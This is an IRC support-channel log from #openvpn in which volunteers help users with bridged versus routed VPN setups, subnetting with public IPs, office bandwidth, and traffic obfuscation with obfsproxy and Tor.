has quit [Remote host closed the connection] 10:30 -!- p3rror [~mezgani@2001:0:53aa:64c:20c2:2140:d606:e632] has joined #openvpn 10:34 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 10:39 < Holiday> argh I feel like I'm running in circles.. I know I have to be making this harder than it really is (of course with the setup the other guy wants maybe it is as hard as I'm making it out to be) 10:45 -!- thermoman [~thermoman@idle.foobar0815.de] has quit [Quit: Bye] 10:45 -!- raidz is now known as raidz_away 10:47 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 10:49 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 272 seconds] 10:49 -!- AsadH is now known as zz_AsadH 10:51 -!- raidz_away is now known as raidz 10:52 -!- foolove [~foo@192.193.172.174] has joined #openvpn 10:53 < foolove> need help troubleshooting my openvpn connection to my remote vpn service my buddy has the same service and he is using a windows box and his connection works fine i have tried two laptops and my connection will not forward the internet it shows im connected but i can not talk out to the internet 10:54 < foolove> i have tried my setup on two different linux boxes one freshly formatted and i get the same result 10:54 <+EugeneKay> !provider 10:54 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 10:56 -!- foolove [~foo@192.193.172.174] has quit [Client Quit] 10:56 < rob0> hehe 10:56 <+EugeneKay> New favorite factoid 10:56 < rob0> it sure was effective 10:58 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:58 <@dazo> EugeneKay: Another way is just to say: I'll help you if you show me your server config ;-) 11:00 < pekster> I've been amused at the uptick in people trying to "hide" traffic via a VPN. Wonder how long before these business models collapse when courts catch up and get pen/trace taps for recording honeypot hits 11:00 < pekster> Maybe then we can get less spam here :) 11:01 < Holiday> I'm back and know I'm just missing something simple. I haven't tried the modified TUN setup yet (using manual ifconfig instead of server flag in config due to server IP etc). 11:01 < Holiday> So I have a bridge setup, I vpn in using tap, I can ping the server's REAL IP from the client but not the bridge IP or the other physical interface on the box 11:02 < Holiday> (I also loose all connectivity from the client at all, streaming music stops, can't type in the shell to the vpn server etc) 11:02 < Holiday> I know I have to be missing something simple and stupid 11:07 < pekster> bridges are inherently more complicated to set up, so you shoudln't use them unless you actually need it 11:07 < pekster> !tunortap 11:07 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 11:07 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 11:10 < Holiday> I know (and TUN was recommended here before) but for our setup tap may be better (maybe not). Either way I'm stuck and I've been banging my head off the wall for the last couple days lol 11:11 -!- gardar [~gardar@gardar.net] has quit [Remote host closed the connection] 11:11 < Holiday> I also noticed after I kill the vpn on client side the server side spits out code=111.. at least I have something to work with maybe 11:12 < pekster> The bit about the server's "real IP" vs "bridge IP" suggests you don't understand how bridging actually works 11:13 < pekster> It's all part of the same network when you bridge; the bridge serves the same effective function as a network switch 11:14 < Holiday> sorry I had meant the other adapter IP (yeah I got the bridge part :)) 11:15 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:15 < Holiday> brb 11:16 < pekster> That'll be a firewall problem then if you can't ping your VPN server's IP after connection 11:24 <@dazo> Holiday: in the moment you bridge f.ex. tap0 and eth0 into br0 ... in that moment all general network setup, routing tables and iptables rules needs to be configured to use br0 ... and they must forget whatever they know about eth0 and tap0 11:25 <@dazo> Holiday: if you need to explicitly firewall on bridge devices, then you need to use ebtables 11:25 <@dazo> Holiday: but I still stand by my last comment ... you have most likely no need for tap+bridging at all .... very, very, very few really needs such setups ... and they are complicated and will be challenging to get working 11:26 < Holiday> dazo: I started a TUN config, but wanted to know if instead of the server option if this would be correct 11:26 < Holiday> dazo: push "topology subnet" 11:26 < Holiday> ifconfig 128.118.88.126 255.255.255.0 11:26 < Holiday> ifconfig-pool 128.118.88.127 128.118.88.145 11:27 <@dazo> Holiday: that is public IP addresses .... use private IP addresses for the VPN subnet 11:27 <@dazo> Holiday: I've pointed you at this URL before, I think ... and the network setup for OpenVPN is explained here: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting#Usingrouting 11:27 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 11:28 < Holiday> dazo: yes I've read that (and I don't want to be a pain in your ass but).. the other guy here insists on using a section of the subnet the phsyical server the VPN is running on for the vpn clients 11:29 <@dazo> Holiday: why? ... that makes absolutely no sense in a routed setup ... and that requirement itself causes just more head-aches 11:29 < Holiday> dazo: I think he reason was initially he was looking to IPsec/L2TP and wanted so see IP's out of this range he had set so he could know where the connections where coming from 11:29 < Holiday> I know 11:30 <@dazo> Holiday: Using a routed setup with a separate VPN network segment, you do see where this traffic comes from 11:30 <@dazo> all network connections from VPN clients will have the VPN clients IP address 11:30 < Holiday> dazo: I'm not 100% sure why he wants that 11:31 <@dazo> (and if you combine that info with the openvpn server log ... you'll even deduct from where that particular VPN client connected over the Internet) 11:31 < pekster> You can still use public IPs on a tun setup 11:31 <@dazo> but you need to be far more careful with routing tables .... otherwise the traffic may escape out on a default gateway 11:32 < pekster> Further, you're free to use a GPL bash script I made avialable that does all the work of accounting for users on dissconnect too: 11:32 < pekster> !accounting 11:32 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting 11:32 < pekster> (user, source/VPN IP, durration, bandwidth, etc) 11:32 <@dazo> Holiday: get that guy you're fighting with into this channel ... and we'll talk some sense into him ;-) 11:33 < Holiday> Thank you! Now, while you're both being so helpful.. do you think my bigger issue right now is the public IP's or the TAP lol 11:34 <@dazo> TAP is the biggest issue, no matter how you twist it ... but public IPs on a VPN are just waste of precious public IP addresses ;-) 11:34 < pekster> tap. No one here said using public IPs was a bad idea (if you've got them to spare it can actually make life easier as no NAT is involved for communicationg with DMZ networks that often don't have return-routes for rfc1918) 11:34 * plaisthos did the part of a subpart setup with tun before 11:34 <@plaisthos> using proxy arp 11:34 < Holiday> pekster: that's one thing he's against, NAT and MASQ 11:34 < pekster> Right. So use public IPs 11:35 < Holiday> ok 11:35 < Holiday> so TUN and public 11:35 < pekster> I did that at a shop that had extra /24's lying around, so a /25 of public IPs got routed to our tun-based OpenVPN server for staff 11:36 < Holiday> NOW with the public's being in the same subnet as the VPN server.. is *that* going to give me grief (that's why I was thinking bridged would be easier since they're all in the same subnet) 11:36 <@dazo> Holiday: then just ensure that your openvpn setup uses --topology subnet ... otherwise, each client gets separate /30 subnets (which allocates 4 IP addresses per client) 11:36 < Holiday> Like I've said I've just done simple vpn setups.. not twisted up like this lol 11:36 < Holiday> yes I have: 11:36 < Holiday> push "topology subnet" 11:36 < Holiday> ifconfig 128.118.88.126 255.255.255.0 11:36 < Holiday> ifconfig-pool 128.118.88.127 128.118.88.145 11:36 < pekster> Get the VPN block routed to the VPN server, ideally. plaisthos noted you can use a proxy-arp solution, but that's more messay than it should be 11:37 <@dazo> Holiday: as long as your public IP addresses can be in a separate network segment ... then the rest is routing tables ... and probably some proxy arp 11:37 < Holiday> the .126 being a carry over from the ipsec deal (where the "vpn server host" is to the clients.. unless that should match the interfaces real ip) 11:37 < pekster> Also, using a /24 is probably a waste unless you actually need 253 connected users at once 11:37 < pekster> (if you do a proper routed setup, anyway) 11:37 <@dazo> pekster: look carefully at his ifconfig-pool 11:38 < Holiday> should I switch up the .126 to 129 and change to a /28 11:38 < Holiday> er 11:38 < Holiday> yeah 28 right? 11:38 < Holiday> lol 11:38 < pekster> dazo: Sure, but tun setup with subnet for that puts an implicit /24 on the routing table 11:38 < pekster> That's a problem if part of that /24 is actually a physical LAN somewhere 11:38 < Holiday> it is 11:38 <@dazo> ahh! Didn't think about that ... yeah, very true! 11:39 < Holiday> the eth0 on that box is 88.5 and the eth1 is 88.120 11:39 < pekster> To re-use that space, that LAN has to be re-numbered (possibly non-trivial) 11:39 < Holiday> so the clients would have IP's that fall in the range of the actual network the vpn server is on 11:40 <@dazo> Holiday: so eth0 is 88.5 and eth1 is 88.120 ... what's their subnet masks? And what would tun0 be? 11:40 < Holiday> the subnet is 255.255.255.0 11:40 < Holiday> which isn't going to work is it lol 11:40 <@plaisthos> pekster: is quite easy on IOS, never used proxy-arp on anything else 11:40 <@dazo> Holiday: okay ... you need to create a separate network segment for tun0 11:41 <@dazo> Holiday: and I am not convinced you need both eth0 and eth1 .... that sounds ... redundant 11:41 <@dazo> (esp. as they are both on the same public network) 11:41 < Holiday> no no I was just pointing out what the machine has in it 11:41 <@dazo> okay, good ... 11:41 < Holiday> one physical interface for the vpn and one for what we call "access" 11:42 < Holiday> again sorry for this being such a pain, but trust me any notes/suggestions/etc you guys have given are all written down 11:42 <@dazo> Holiday: so ... your setup ... will it be more like the first ASCII art here: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting#Usingrouting .... or more like this one: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting#UsingroutingandOpenVPNnotrunningonthedefaultgateway 11:42 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 11:43 < Holiday> #2, where only eth1 is used for VPN (not say in eth1 and out eth0) 11:44 < Holiday> so pretty much eth0 has nothing to do with the setup at all 11:44 <@dazo> okay 11:44 < Holiday> (just happens to be in the box and something I check to see if I can ping when I connect) 11:44 <@dazo> then you need to split your 128.118.88.0/24 subnet up ... you need to allocate a separate segment for the VPN tun0 adapter 11:45 <@dazo> the quickest and easiest is to set up 128.118.88.0/25 (255.255.255.128) and 128.118.88.128/25 11:46 < Holiday> NOW I' 11:46 <@dazo> then you decide which half will be for ethX and which one for tun0 (configured via the --ifconfig option) 11:47 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has joined #openvpn 11:47 < Holiday> now, if he decides to go private instead of doing the splitting, I recall I think you mentioned before you could get away with that without nat, correct? 11:48 < MFSOT> Hey all, I'm setting up an openVPN client with pfSense server, I'm trying to convince my boss to go to cable 50/5mbs and he says we're fine with dsl, which I'm not sure what we're even getting on there, but it's all over the place. For a small office of 5 piping in, usually only 2-3 at a time how much bandwidth do you think I need? 11:48 < Holiday> (just throwing that out there so I'm all prepped up for when I pass this along) 11:48 <@dazo> Holiday: you can avoid NAT yes, but then only for internal network traffic ... in the moment you want to go to the public Internet with a public IP, then you need to NAT the VPN traffic 11:49 < Holiday> all we care about as far as I know is accessing the boxes on the .88.x network 11:49 < Holiday> so the same ip range as the vpn box is located 11:50 <@dazo> MFSOT: 50/5 in that setup would be generous ... I have a setup which have peaked at 5-6 people at the same time, with a 10/10 SDSL line ... and nobody noticed anything in regards to performance reduction 11:50 <@dazo> MFSOT: Anyhow, it's the uplink speed you'll notice on the VPN basically 11:51 <@dazo> Holiday: then having a private subnet would be perfectly fine ... then you can just follow the setup of the #1 description ... just replace 192.168.x.x with your public IPs instead 11:51 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has quit [Read error: Connection reset by peer] 11:52 <@dazo> MFSOT probably didn't like that answer .... 11:52 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has joined #openvpn 11:52 < Holiday> Dazo: or their dsl from verizon is that flaky there :) 11:52 <@dazo> heh ... true :) 11:52 <@dazo> MFSOT: did you get my replies? 11:53 < Holiday> dazo: I'll follow that and hopefully get this thing finally churning away without having to pick your brain much more lol. Thanks all of you who jumped in earlier with the good info! 11:53 < Holiday> I'll report back and let you know if I set off the halon system or not lol 11:53 <@dazo> Holiday: you're welcome! 11:53 < MFSOT> dazo: ya, I was shooting for the 50/5 for the 5 up 11:53 < MFSOT> next step down is 30/3 11:53 < MFSOT> testing our up right now on dsl 11:54 < MFSOT> dazo: yes, thank you 11:54 <@dazo> goodie! 11:54 < Holiday> mfsot: just curious but what cable co would that be with? 11:54 < MFSOT> well we started out with a whopping 282 ms ping 11:54 < pekster> SDSL might give you more than 5 up (contrast that ot ADSL common on many home nets) 11:54 < MFSOT> a 1.14 down 11:54 < MFSOT> and a .25 up :-/ 11:54 < pekster> It's when users save that 15M excell doc that you get hit ;) 11:54 < MFSOT> Holiday: charter - northeast 11:55 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 11:55 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 11:55 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:55 -!- mode/#openvpn [+o krzee] by ChanServ 11:55 < Holiday> mfsot: okay was just curious (the 50mbps down w/comcast is 10 up, so when I saw east.verizon I wasn't sure who you had to deal with) 11:55 <@dazo> MFSOT: I'd rather put money on a synchronous link than a 50/5 link .... I'd say 5/5 might actually be what you need ... depending on what you have today 11:56 < MFSOT> well the connection will be shared with our physical office 11:56 <@dazo> MFSOT: what do you have now? 11:56 < MFSOT> I'd like more than 5 down 11:57 <@dazo> 10/10 is probably the next logical step then 11:57 < MFSOT> doing some tests on speakeasy and speedtest 11:57 < MFSOT> 6.36/.72 11:57 <@dazo> the site I have with 10/10 SDSL .... that's ~20 people in the office at the same time, plus serving mail and web 11:57 < MFSOT> on both sites :-\ 11:57 <@dazo> oh, that .72 is a killer 11:57 < MFSOT> ya this is horrible 11:58 < MFSOT> well I can get 30/3 from charter for the same price 11:58 < MFSOT> dazo: can dsl/verizon up my bandwidth to a custom level? 11:58 <@dazo> don't look yourself blind at the 30 ... asynchronous lines might be shared badly with other clients too 11:59 <@dazo> MFSOT: I dunno ... depends on their equipment and setup .... I'm not in the US, so I have no idea about what they do 11:59 < MFSOT> dazo: I'm more of a sys admin thrust into this roll, I have decent networking skills but not advance, what do man synchronous link? 11:59 * dazo guesses they do whatever to extort as much money out of their customers though 11:59 < pekster> Some providers, depending on equipment, can go 25 Mbps in either direction on DSL. If they do or not is up to them and the equipment/line conditions 11:59 < MFSOT> * dazo is right 11:59 < pekster> Maybe more for the 'latest gen' DSL stuff 12:00 <@dazo> MFSOT: asynchronous means like 30/3 ... not the same speed up and down .... while synchronous is like 5/5 ... where both speeds are the same 12:00 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:00 < Holiday> Mfsot: yeah, i looked into getting Verizon DSL... it's a joke in my area compared to what say comcast offers (for as "evil" as comcast is) 12:00 < pekster> Actually, 25Mbps is faster than the Comcast here, discounting bursts :\ 12:00 <@dazo> synchronous are usually hosted on backends aimed for companies with more critical SLAs 12:01 < Holiday> see if the maybe have FiOS? 12:01 <@dazo> async is what most home users get .... and what have the best prices, but also the backends which is most overcommitted 12:01 <@dazo> (they have 1000 customers on a 1Gbit link, selling them 3-10Mbit downlinks) 12:02 < MFSOT> Holiday - unfortunately in Mass each town contracts with a certain provider and that's what we get stuck with, in my case charter 12:02 < Holiday> yeah, PA is the same way 12:03 < Holiday> But verizon is your phone service in that area, correct? 12:03 < MFSOT> yes 12:03 < MFSOT> that's our dsl provider 12:03 < Holiday> see if they have FiOS in your area 12:03 < MFSOT> oh true 12:03 < Holiday> I don't know how far they got with deploying it before they called it quits, but a crapload better than their DSL 12:03 < Holiday> well 12:03 < Holiday> On paper anyhow, I haven't used it personally :) 12:04 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 12:04 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 12:05 < MFSOT> of course everything needs to run fast and great for no money 12:05 < Holiday> yup! (And on that note lunch) I'll report back Dazo and let you guys know how it works out 12:05 < pekster> Google Fiber is doing that ;) 12:07 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has joined #openvpn 12:08 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 12:09 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 12:10 < MFSOT> pekster, if only I lived in Kansas 12:11 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:37 <@krzee> move to kansas and ill pay for your google fiber with my colocation fees 12:46 -!- Timmy [~muhammad@unaffiliated/timmyt] has joined #openvpn 12:46 < Timmy> is openVPN detectable by ISPs or governments? I want to use openVPN services instead TOR because it works faster 12:47 <+EugeneKay> Yes. 12:47 < pekster> In server/client mode, yes. In static key mode it's literally sending random data down the wire, so just the endpoints could be determined, and that "some encrypted data" was being exchanged 12:48 < pekster> However, static keys loose the advantage of perfect forward secrecy, so there is a trade-off 12:55 -!- jthunder [~jthunder@184.151.222.94] has quit [Ping timeout: 272 seconds] 12:56 < Timmy> well i am using the free service of VPNbook, is this stupid? 13:04 -!- jthunder [~jthunder@184.151.222.94] has joined #openvpn 13:08 -!- Timmy_ [~Timmy@37.254.124.113] has joined #openvpn 13:10 -!- Timmy_ [~Timmy@37.254.124.113] has quit [Client Quit] 13:11 -!- Timmy [~muhammad@unaffiliated/timmyt] has quit [Ping timeout: 272 seconds] 13:12 -!- Orbi [~opera@anon-149-22.vpn.ipredator.se] has joined #openvpn 13:16 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 272 seconds] 13:20 <@krzee> !obfs 13:20 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation 13:20 <@krzee> !forget obfs 13:20 <@vpnHelper> Error: 2 factoids have that key. Please specify which one to remove, or use * to designate all of them. 13:20 <@krzee> !forget obfs * 13:20 <@vpnHelper> Joo got it. 13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 13:20 <@krzee> !learn obfs as if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en to encapsulate your packets in other protocols 13:20 <@vpnHelper> Joo got it. 13:21 <@krzee> !learn obfs as http://community.openvpn.net/openvpn/wiki/TrafficObfuscation 13:21 <@vpnHelper> Joo got it. 13:22 <@krzee> !learn obfs as in client/server mode an admin can know that openvpn is being used. in static-key mode they only know that it is some encrypted data, but not specifically openvpn; however with static-key you lose forward security (!forwardsecurity) 13:22 <@vpnHelper> Joo got it. 13:22 <@krzee> !forwardsecurity 13:22 <@vpnHelper> "forwardsecurity" is (#1) in server/client mode with certs your key renegotiates (changes) every hour (by default), so if someone captures your traffic, and then gets your key, they can only decrypt the traffic within the timeframe since last renegotiation or (#2) in ptp mode (static key) you do not have this, so if someone gets your key they can decrypt ANY past traffic that they captured 13:22 <@krzee> there we goes =] 13:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:32 -!- novaflash is now known as novaflash_away 13:33 -!- [p0rk] [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has left #openvpn ["Leaving"] 13:38 -!- novaflash_away is now known as novaflash 13:41 -!- jthunder [~jthunder@184.151.222.94] has quit [Ping timeout: 255 seconds] 13:47 -!- baobeiiii [~baobeiiii@192.73.252.248] has joined #openvpn 13:49 -!- baobeiiii is now known as daniear 13:52 -!- daniear [~baobeiiii@192.73.252.248] has left #openvpn ["Leaving"] 13:55 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 14:00 <@dazo> krzee: I added a simple configuration howto for obfsproxy on the !obfs URL 14:00 <@krzee> awesome! 14:01 <@dazo> it's really simple ... so simple it was almost not worth it .... but some people need it :-P 14:01 * dazo still waits for a few of his patches to be applied upstream ... which adds --daemon and --user/--group features to obfsproxy 14:02 < pekster> I'd be fun to see some of that get more adoption bypassing opressive government filtering and the like 14:02 < pekster> tor doesn't help most users in that situation since it makes no attempt to hide what it is 14:03 < pekster> It'd* 14:03 <@dazo> pekster: obfsproxy has a special TOR mode too ... so it can be used more "integrated" with tor ... but of course, it requires obfsproxy on the tor server side too 14:04 < pekster> Right, but that defeats the purupose of needing tor if you can tunnel out using obfuscation to bypass the opressive firewall in the first place :) 14:04 < pekster> No point layering slow protocols on top, heh 14:05 <@dazo> pekster: well, tor isn't for obfuscation ... that's to make you anonymous 14:06 < pekster> Sure, and I suppose that could still be required in certain cases. I think the most common case of '$firewalled_user wants to visit news sites, facebook, and twitter' doesn't require tor 14:06 <@dazo> agreed 14:06 < pekster> tor is great, but not for regular use :P 14:06 < pekster> Dial-up is faster... 14:06 < pekster> Depending on content anyway 14:07 <@dazo> I'm mostly thinking of whistleblowers, journalists reporting from certain regimes, and people in risk of prosecution who can benefit most from tor 14:07 < pekster> Yea 14:07 < pekster> obfsproxy to get out of the country plus tor on top to protect their identity 14:07 <@dazo> yeah 14:08 <@dazo> and also to hide the tor traffic .... Secret police: "Hey, you're using TOR - you are doing something we don't like" --> "arrest" 14:08 < pekster> Or, really "whatever" to get out. Be it obfsproxy, openvpn with symmetric crypto, or RFC1149 14:09 <@dazo> hehe ... rfc1149 ... that's a good one .... you know someone actually managed to implement it? 14:09 < pekster> Yes 14:09 * dazo is quite impressed by that :) 14:09 < pekster> There have been 2 fairly well-documented implementations 14:09 < pekster> Although the first group did it better 14:10 <@dazo> hehe ... that's the group where Alan Cox was involved? 14:10 < kisom> We had this idea about implementing IP over gunfire 14:10 < kisom> ...didn't happen 14:10 < pekster> http://www.blug.linux.no/rfc1149/ 14:11 <@vpnHelper> Title: Bergen Linux User Group (at www.blug.linux.no) 14:11 <@dazo> hahaha .... well, I guess that could be quite an adventure :-p 14:11 <@dazo> pekster: yeah, that's the one with Alan Cox ... http://www.blug.linux.no/rfc1149/vegard_bilder/tn/04preparation_fri_alan.jpg.html 14:11 <@vpnHelper> Title: Album: 04preparation fri alan (at www.blug.linux.no) 14:11 < pekster> Ah, there we go 14:12 < pekster> Yea, he's hard to recoganize unless he's surrounded by ALL CAPS ;) 14:12 <@dazo> hehehehe 14:13 * dazo thinks its about time to go home :) 14:13 < pekster> I like their download too: pidgeonware-0.15.tar.gz 14:13 < pekster> s/d// 14:15 -!- dazo is now known as dazo_afk 14:15 < pekster> Ah, here's the link to the other one: http://www.bsdly.net/~peter/rfc1149-talk/ 14:15 <@vpnHelper> Title: The RFC1149 implementation project (at www.bsdly.net) 14:15 < pekster> Circa 2005 14:16 < pekster> Oh, nope, they just wrapped up the old one. Humph, I swear there was another group that followed suit, but I dunno where that went 14:36 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 14:36 -!- jthunder_ [~jthunder@184.151.222.94] has joined #openvpn 14:37 -!- jthunder_ is now known as jthunder 14:37 -!- Devastator [~devas@186.214.15.240] has joined #openvpn 14:42 < Holiday> I'm back 14:44 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 14:45 -!- loompek [~noname@unaffiliated/loompek] has quit [Quit: ( www.nnscript.com :: NoNameScript 4.22 :: www.esnation.com )] 14:46 < Holiday> okay.. I know you guys are ready to kill me, but he's determined to get tap working lol 14:46 -!- Devastator [~devas@186.214.15.240] has quit [Changing host] 14:46 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 14:47 < Holiday> the VPN is working as a gateway (he re-routed another linux box to use the VPN as it's gateway and he's able to get to machines on the same subnet as well as other subnets) so that's all good 14:47 < Holiday> but I can't do crap when I connect from the openvpn client "built into" centos on my machine here.. it connects, I can ping the vpn server IP as well as my vpn client IP, but nothing else (and my internet connection locks up) 14:48 < Holiday> he can't ping my client IP, but I also notice after I disconnect and the ssh session "revives" I see a lot of ECONNREFUSED: connection refused (code=111) 14:50 < pekster> tap is still a horrible solution for you. You do realize that any VPN client will be able to arp-spoof any other system on that LAN, right? 14:51 < pekster> the connection refused is completely expected when one of the sockets goes down and the peer returns ICMP port-unreach errors 14:51 < Holiday> yeah but he also wants IPv6 14:51 < pekster> openvpn does ipv6 14:51 < Holiday> okay 14:51 < pekster> Without tap 14:51 < Holiday> in 2.3.0 14:51 < pekster> !ipv6 14:51 < Holiday> right 14:51 <@vpnHelper> "ipv6" is (#1) http://www.greenie.net/ipv6/openvpn.html for info about the ipv6 patch (adds nice ipv6 options to openvpn) or (#2) use 2.3 or see !snapshots for a release with ipv6 patches in it or (#3) http://ipstats.arvig.net/BraveHeartMEME.jpg 14:53 -!- Orbi [~opera@anon-149-22.vpn.ipredator.se] has left #openvpn [] 14:53 -!- Orbi [~opera@anon-149-22.vpn.ipredator.se] has joined #openvpn 14:53 < Holiday> well I'm kind of stuck in a hard place as he doesn't want to split the subnet, would like to stick with ethernet bridging, and doesn't want nat/masq (and insists on using that pool of public IP's) 14:53 -!- Orbi [~opera@anon-149-22.vpn.ipredator.se] has left #openvpn [] 14:54 < Holiday> I know it's not optimal though 14:54 < pekster> Sure. It's a bad solution, but you can do it anyway 14:54 < Holiday> I just can't get the last part down or so it seems 14:55 < Holiday> for 0.0.0.0 it's setting the gateway 128.118.88.120 (vpn server) if I force gateway on client.. if I don't the 128.118.88.0 gets a gateway of 0.0.0.0 14:55 < pekster> You're wasting header space, you're needlessly sending broadcasts around, and unless you're doing 802.1X or something, you're exposing the entire server-side LAN to possible client attacks by malware of mallicious users including clients setting arbitrary IPs if users/malware is clever enough to do that, or arp-spoofing attacks where a client can redirect traffic of any host 14:55 < pekster> Just be aware of that 14:56 < Holiday> *nod* I understand 14:56 -!- jthunder_ [~jthunder@184.151.222.94] has joined #openvpn 14:56 < Holiday> it's fairly firewalled up on that subnet 14:56 < pekster> Not anymore 14:56 < Holiday> and I understand the vpn clients are an opening 14:56 < pekster> WOuld you let your VPN users connect to a switch on that LAN? 14:56 < pekster> Becuase that's exactly what you're doing 14:57 < pekster> If you're trying to redirect the gateway, you should use the directive for that so the VPN-route itself gets set: 14:57 < pekster> !redirect 14:57 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 14:57 <@vpnHelper> http://ircpimps.org/redirect.png 14:58 -!- jthunder [~jthunder@184.151.222.94] has quit [Ping timeout: 260 seconds] 14:58 -!- jthunder_ is now known as jthunder 14:58 < Holiday> I un-commented the push "redirect-gateway def1 bypass-dhcp" but still a no go when I try to ping anything 14:59 < Holiday> he manually setup the bridge and like I said he can route via it 14:59 < Holiday> and I can ping it from a connected client but can't get to the other physical eth interface or outside 14:59 < pekster> Then it's a firewall issue. Still. 14:59 < pekster> If you can ping the VPN endpoint, the VPn is working just fine 14:59 < Holiday> he shut down the firewall 15:00 < pekster> Then go tcpdump 15:04 -!- jthunder [~jthunder@184.151.222.94] has quit [Remote host closed the connection] 15:04 < Holiday> tcpdump is showing my client on the bridge 15:05 < Holiday> you can see the who-has requests on the bridge etc 15:05 < Holiday> but it also seems to be pulling junk out of its butt lol (looking up hostnames like tmzqetymrd. 15:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:07 < Holiday> im' going to try with a different client 15:14 -!- bandroid [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 15:21 -!- Holiday [~rjr162@128.118.15.39] has quit [Ping timeout: 245 seconds] 15:26 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 15:27 < Valcorb> hey pekster: I've been looking into the issue, and it seems that there is no ethernet interface called eth0, so that might be the issue 15:27 < Valcorb> i have lo, tun0, venet0 and venet0:0 15:28 < pekster> That would be an issue if you expect eth0 to exist, yes 15:29 < Valcorb> yup 15:29 < Valcorb> but i forgot how to use snat, do you know how? 15:29 < pekster> I bet the manpage or help output does 15:29 < pekster> I'll even give you one free: 'iptables -j SNAT -h' 15:30 < pekster> How to use it depends greatly on what you intend to do 15:30 < pekster> See also the MASQUERADE target; both are in iptables-extensions(8) 15:31 < Valcorb> i see 15:31 < Valcorb> thanks 15:39 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 15:52 -!- gardar [~gardar@gardar.net] has joined #openvpn 15:56 -!- nickanderson is now known as nickanderson_afk 15:56 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 15:56 -!- mode/#openvpn [+v s7r] by ChanServ 16:07 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 16:16 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 16:24 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 16:41 -!- lickalott is now known as lickalottalottap 16:41 -!- lickalottalottap is now known as lickalottapuss 16:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 16:45 -!- nickanderson_afk is now known as nickanderson 16:48 -!- lickalottapuss is now known as lickalott 16:52 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 272 seconds] 17:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 17:01 -!- raidz is now known as raidz_away 17:02 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 17:15 -!- zz_AsadH is now known as AsadH 17:15 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 246 seconds] 17:21 -!- pwrcycle 